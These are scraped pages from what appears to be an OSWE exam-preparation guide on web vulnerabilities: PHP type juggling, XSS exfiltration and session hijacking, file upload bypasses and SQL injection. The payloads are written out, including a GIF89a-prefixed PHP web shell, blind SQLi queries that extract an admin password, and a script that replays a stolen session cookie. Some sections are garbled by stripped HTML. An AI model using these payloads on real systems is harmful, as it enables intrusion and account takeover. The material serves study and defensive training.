[PERL](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#perl) * [JSP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#jsp) --- # Decompiling | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/decompiling.md) . ### JADX(-GUI)[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/decompiling#jadx-gui) [GitHub - skylot/jadx: Dex to Java decompilerGitHub](https://github.com/skylot/jadx) **Open** `**.jar**` **file > File > Save All** [PreviousJava](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java) [NextCompiling & Running](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running) Last updated 6 years ago --- # Type Juggling | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling.md) . [Summary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary) [Practice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/practice) [PreviousRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex) [NextSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary) Last updated 6 years ago --- # Regex | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex.md) . Weak Comparison[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex#weak-comparison) --------------------------------------------------------------------------------------------------------------------- Copy ((STRCMP).*== *0|0 *== *(STRCMP)) Copy == Weak Filtering[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex#weak-filtering) ------------------------------------------------------------------------------------------------------------------- Copy (PREG_REPLACE)[ \('"]*/ *[a-z0-9]{2,} Deserialization[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex#deserialization) --------------------------------------------------------------------------------------------------------------------- #### Regex to find unserialize function followed by anything being passed a variable.[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex#regex-to-find-unserialize-function-followed-by-anything-being-passed-a-variable) Copy unserialize\(.*(\$)* [PreviousPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php) [NextType Juggling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling) Last updated 6 years ago * [Weak Comparison](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex#weak-comparison) * [Weak Filtering](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex#weak-filtering) * [Deserialization](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex#deserialization) --- # XSS | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss.md) . Reflected[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#reflected) -------------------------------------------------------------------------------------------------------- ### Vulnerable code[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#vulnerable-code) CopySearched string: ' . $_GET['search'] . '
'; ?> #### The injection[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#the-injection) `http(s)://HOST/file.php?search=1` #### Response[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#response) CopySearched string: 1
` #### Response[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#response-1) Copy
Searched string:
` -> Reopening `p` tag for the response not to mess up.
Stored[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#stored)
--------------------------------------------------------------------------------------------------
In this injection, the code gets **stored** into a database (e.g. as a comment, name, description, etc) and then gets reflected when it is displayed.
Data exfiltration[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#data-exfiltration)
------------------------------------------------------------------------------------------------------------------------
To **exfiltrate** data, a receiving server would be needed, like a HTPP server.
NGROK's substitute for tunXs and python's SimpleHTTPSever/http.server
### Exfiltrating basic data[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#exfiltrating-basic-data)
### Exfiltrating other endpoint's data[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#exfiltrating-other-endpoints-data)
Session Hijaking[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#session-hijaking)
----------------------------------------------------------------------------------------------------------------------
In a nuthshell, stealing the (administrator|authenticated user) sesion cookie's value and using it.
### Exfiltrating the cookie[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#exfiltrating-the-cookie)
### Using the cookie[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#using-the-cookie)
Filter Bypass[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#filter-bypass)
----------------------------------------------------------------------------------------------------------------
[https://owasp.org/www-community/xss-filter-evasion-cheatsheetowasp.org](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)
[https://itasahobby.gitlab.io/posts/trustedclient/itasahobby.gitlab.io](https://itasahobby.gitlab.io/posts/trustedclient/)
[PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/resources)
[NextXXE](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe)
Last updated 6 years ago
* [Reflected](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#reflected)
* [Vulnerable code](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#vulnerable-code)
* [Stored](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#stored)
* [Data exfiltration](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#data-exfiltration)
* [Exfiltrating basic data](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#exfiltrating-basic-data)
* [Exfiltrating other endpoint's data](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#exfiltrating-other-endpoints-data)
* [Session Hijaking](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#session-hijaking)
* [Exfiltrating the cookie](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#exfiltrating-the-cookie)
* [Using the cookie](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#using-the-cookie)
* [Filter Bypass](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#filter-bypass)
Copy
Copy
Copy
Copy
import requests
url = ""
exfiltrated_cookie = ""
cookies = {'PHPSESSID': f"{exfiltrated_cookie}"} # Example
r = requests.get(url, cookies=cookies)
---
# REGEX | AWAE - OSWE Preparation / Resources
For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt)
. This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex.md)
.
Learning Resources[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex#learning-resources)
-----------------------------------------------------------------------------------------------------------
[RegexOne - Learn Regular Expressions - Lesson 1: An Introduction, and the ABCsRegexOne - Learn regular expressions with simple, interactive exercises.](https://regexone.com/)
[GitHub - ziishaned/learn-regex: Learn regex the easy wayGitHub](https://github.com/ziishaned/learn-regex)
Filter Bypass[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex#filter-bypass)
-------------------------------------------------------------------------------------------------
I'd say that mastering regular expressions could be enough to come up with bypasses.
[XSS - Bypass this RegExpInformation Security Stack Exchange](https://security.stackexchange.com/questions/71169/xss-bypass-this-regexp)
[PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/resources)
[NextPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php)
Last updated 6 years ago
* [Learning Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex#learning-resources)
* [Filter Bypass](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex#filter-bypass)
---
# Practice | AWAE - OSWE Preparation / Resources
For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt)
. This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs/practice.md)
.
[GitHub - xuezzou/Vulnerable-nodejs: A vulnerable nodejs web app with expresss and MongoDB for final project of cyber security courseGitHub](https://github.com/xuezzou/Vulnerable-nodejs)
[PreviousNodeJS](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs)
[NextRandom](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/random)
Last updated 6 years ago
---
# Tricks | AWAE - OSWE Preparation / Resources
For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt)
. This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks.md)
.
Null Byte[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#gif-89-a-header)
-------------------------------------------------------------------------------------------------------------------------------------------------
* .php%00.gif
* .php\\x00.gif
* .php%00.png
* .php\\x00.png
* .php%00.jpg
* .php\\x00.jpg
Mime type[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#mime-type)
-------------------------------------------------------------------------------------------------------------------------------------------
* `Content-Type : image/gif`
* `Content-Type : image/png`
* `Content-Type : image/jpeg`
GIF89a;[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#gif-89-a-header-1)
-------------------------------------------------------------------------------------------------------------------------------------------------
Copy
GIF89a;
system($_GET['cmd']);
?>
Inside image's content[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#inside-images-content)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------
Create ZIP manually (e.g: zipslip)[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#create-zip-manually-e.g-zipslip)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Using [zipfile](https://docs.python.org/3/library/zipfile.html)
[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#using-zipfile)
[PreviousFile Upload Restrictions Bypass](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass)
[NextFile Extension Filters Bypass List](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass)
Last updated 6 years ago
* [Null Byte](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#gif-89-a-header)
* [Mime type](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#mime-type)
* [GIF89a;](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#gif-89-a-header-1)
* [Inside image's content](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#inside-images-content)
* [Create ZIP manually (e.g: zipslip)](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#create-zip-manually-e.g-zipslip)
* [Using zipfile](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks#using-zipfile)
Copy
exiftool -Comment='' photo.jpg
Copy
from zipfile import ZipFile
zip = ZipFile("test.zip", "w")
zip.writestr("path", "content")
zip.close()
---
# Java | AWAE - OSWE Preparation / Resources
For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt)
. This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java.md)
.
[Decompiling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/decompiling)
[Compiling & Running](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running)
[PreviousPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/practice)
[NextDecompiling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/decompiling)
Last updated 6 years ago
---
# Practice | AWAE - OSWE Preparation / Resources
For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt)
. This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/practice.md)
.
`Mike's Dungeon` from [Follow the White Rabbit](https://fwhibbit.es/)
's CTF where I took part in.
[https://ctf.fwhibbit.es/ctf.fwhibbit.es](https://ctf.fwhibbit.es/)
`Compare the pair` from 247CTF (Great website to practice on)
[247CTF - The game never stops247CTF](https://247ctf.com/)
[PreviousSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary)
[NextJava](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java)
Last updated 6 years ago
---
# Summary | AWAE - OSWE Preparation / Resources
For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt)
. This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary.md)
.
### Some information[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary#some-information)
The php console interpreter can be open by typing `php -a` in your console. Otherwise, there are online projects such as [onlinephpfunctions](http://sandbox.onlinephpfunctions.com/)
that will help you along. Furthermore, for this examples I will be using `var_dump()`php's function to propperly see every side of the results.
### Beginning[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary#beginning)
First of all, we need the presence of a [loose comparison](https://www.copterlabs.com/strict-vs-loose-comparisons-in-php/)
(`==`) operator. The main difference between it and the `strict comparison` is that only the second one checks that the same type is being compared. Then, both of the variables should be controlled by us. (Knowing the value of one of them we don't control can be sometimes useful too)
#### The key of this vulnerability[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary#the-key-of-this-vulnerability)
Imagine having this background:
Copy
if ($j == $e) {
eval(pwned);
}
This is obviously never gonna happen (at least it should), but it's a nice example to make up some ideas.
Copy
php > var_dump("0e1337" == 0);
bool(true)
php > var_dump("0e1337" == "0");
bool(true)
php > var_dump(0e1337 == "0");
bool(true)
php > var_dump("2e2" == "200");
bool(true)
As you can see, the conversion is quite easy to understand. `XeY` stands for `print("X"+"0"*Y)`represented in python.
#### A trick[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary#a-trick)
To propperly see the value that the string will return after the conversion, the `intval()` function can be used.
#### Involving hashing methods[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary#involving-hashing-methods)
As seen before, if both of the values are user-controlled, or at least one does and the other value is known/guessable, it is relatively easy to exploit this vulnerability. However, there are tons of cases where the user-controlled variable is being passed to a hash function like `MD5` or `SHA1` and then compared through the `loose comparison operator`.
For this, there's another trick we will be using called `Magic hashes`. Theese are strings whose specific hash returns a number like the ones we've seen before.
Imagine having this background:
In this example, using `$a = "0e1337"` and `$b = "0"` won't return true, because after the `loose comparison`, a hash function is made.
Thanks to `PayloadAllTheThings` we have a list of `magic` strings that will return a value like the ones seen before. [git repo](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Type%20Juggling)
To finish with, `$a = "240610708"` and `$b = "10932435112"` will definetely return true!
[PreviousType Juggling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling)
[NextPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/practice)
Last updated 6 years ago
* [Some information](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary#some-information)
* [Beginning](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary#beginning)
Copy
php > var_dump(intval("2e1"));
int(20)
php > var_dump(intval("2e2"));
int(200)
php > var_dump(intval("0e1337"));
int(0)
php > var_dump(intval("0e1337101"));
int(0)
Copy
if (md5($a) == sha1($b)) {
eval(pwned_again)
}
---
# Unknown
\> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types.md).
# Types
## Boolean
This injection consists of the boolean result of a query making the website return different responses. For example, a query that returns the products following a specific criteria (e.g. category) would always return the intended results unless the query gets appended an injection adding more specifications to match.
Let's imagine having this background:
\`\`\`sql
SELECT id, name, price FROM products WHERE category = '$supplied\_category';
\`\`\`
If the supplied category exists, and it will the most of the times, as every page having this structure would let the user choose the category between the intended ones, the products will be printed in the response. However, in the case that the supplied parameter is not propperly sanitized, someting like this could happen:
\`\`\`sql
SELECT id, name, price FROM products WHERE category = 'sports' AND 1=1;
\`\`\`
This won't change the behaviour of the response, as there are sports products and 1 equals 1, but what about this?
\`\`\`sql
SELECT id, name, price FROM products WHERE category = 'sports' AND price > 24;
\`\`\`
This will certainly change the response, as only those sports products whose price is higher that 24 will appear. Now is when more complex injections pitch in.
### Subqueries
\`\`\`sql
SELECT id, name, price FROM products WHERE category = 'sports' AND (SELECT password FROM user\_table WHERE username = 'admin')='adminpwd';
\`\`\`
This time, the actual query gets appended a \[subquery\](https://www.w3resource.com/mysql/subqueries/index.php) being compared to a value. If the admin password equals to adminpwd, the website will be returning the same products as before, otherwise, it would be returning no results.
### SUBSTR
However, using subqueries is not that easy, sometimes the values aren't so guessable, that's why substr() function is useful here.
\`\`\`sql
SELECT id, name, price FROM products WHERE category = 'sports' AND SUBSTR((SELECT password FROM user\_table WHERE username = 'admin'),1,1)='a';
\`\`\`
As you can see, the way this function works is quite the same as it does in most of the languages.
\`\`\`
SUBSTR( PARAM\_TO\_EVALUATE, STARTING\_POINT, ENDING\_POINT )
\`\`\`
\* Notice that another pair of parenthesis is added to the subquery, as it is not a single parameter.
In a nuthsell, the first letter is being compared to an a. If it does start by an a, the server would return the intended sports products result. Doing this by iterating through a dictionary (and leveraging the compared position of the letter) could be useful to obtain the entire value. However, there's a problem, it is not case sensitive!
### ASCII + SUBSTR
This is the most powerful way to ensure the retrieved data is correct.
\`\`\`sql
SELECT id, name, price FROM products WHERE category = 'sports' AND ASCII(SUBSTR((SELECT password FROM user\_table WHERE username = 'admin'),1,1))=97;
\`\`\`
As you can see, the compared number is an ASCII number now, and the result of the substr of the subquery is converted to ASCII. Thanks to this technique, we can now iterate over the whole range of ASCII characters from 32 to 125.
## Blind Time-Based
This type of injection is almost the same as the Boolean one, but involving server-side time waiting.
### Fast Example
\`\`\`sql
SELECT id, name, price FROM products WHERE category = 'sports' AND (SELECT password FROM user\_table WHERE username = 'admin')='adminpwd' AND SLEEP(10);
\`\`\`
#### Empty set (10.001 sec)
This result means that the last AND operator has been executed and the sleep() function too, so the subquery equals the compared value.
Obviously, as everything in this field, it can be used in lots of cases and tons of ways.
---
# Unknown
\> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language.md).
# By Language
- \[JAVA\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java.md)
- \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex.md)
- \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary.md)
---
# Unknown
\> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java.md).
# JAVA
- \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex.md)
- \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary.md)
---
# Unknown
\> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions.md).
# Bypassing Character Restrictions
## General
### Space -> Comment
\`\`\`sql
SELECT id, user, password FROM users WHERE id = '1';
\`\`\`
\`\`\`sql
SELECT/\*\*/id,/\*\*/user,/\*\*/password/\*\*/FROM/\*\*/users/\*\*/WHERE/\*\*/id/\*\*/=/\*\*/'1';
\`\`\`
### Upper and Lower case
\`\`\`sql
SELECT id, user, password FROM users WHERE id = '1';
\`\`\`
\`\`\`sql
SeLeCT id, user, password frOM users WHeRe id = '1';
\`\`\`
## MySQL
### Hexadecimal
\`\`\`sql
SELECT 0x6a6f726765637466 #SELECT 'jorgectf'
\`\`\`
## PostgreSQL
### ASCII concatenation
\`\`\`python
print('||'.join("CHR("+str(ord(i))+")" for i in "jorgectf"))
\`\`\`
\`\`\`sql
SELECT CHR(106)||CHR(111)||CHR(114)||CHR(103)||CHR(101)||CHR(99)||CHR(116)||CHR(102) #SELECT jorgectf
\`\`\`
### Single Quote Bypass using $$
\`\`\`sql
$$jorgectf$$ #'jorgectf'
> AND $$jorgectf$$ = 'jorgectf' AND (SELECT 1 FROM pg\_sleep(10))=1
0:00:10.491213
\`\`\`
### Unicode
\`\`\`sql
SELECT U&"\\006a\\006f\\0072\\0067\\0065\\0063\\0074\\0066" #SELECT jorgectf
SELECT U&'\\006a\\006f\\0072\\0067\\0065\\0063\\0074\\0066' #SELECT 'jorgectf'
U&'\\006a\\006f\\0072\\0067\\0065\\0063\\0074\\0066'() #jorgectf()
\`\`\`
## More information
{% embed url=" Searched string: ' . $\_GET\['search'\] . ' Searched string: 1
\` #### Response \`\`\`markup
Searched string:
\` -> Reopening \`p\` tag for the response not to mess up.
## Stored
In this injection, the code gets \*\*stored\*\* into a database (e.g. as a comment, name, description, etc) and then gets reflected when it is displayed.
## Data exfiltration
To \*\*exfiltrate\*\* data, a receiving server would be needed, like a HTPP server.
{% embed url="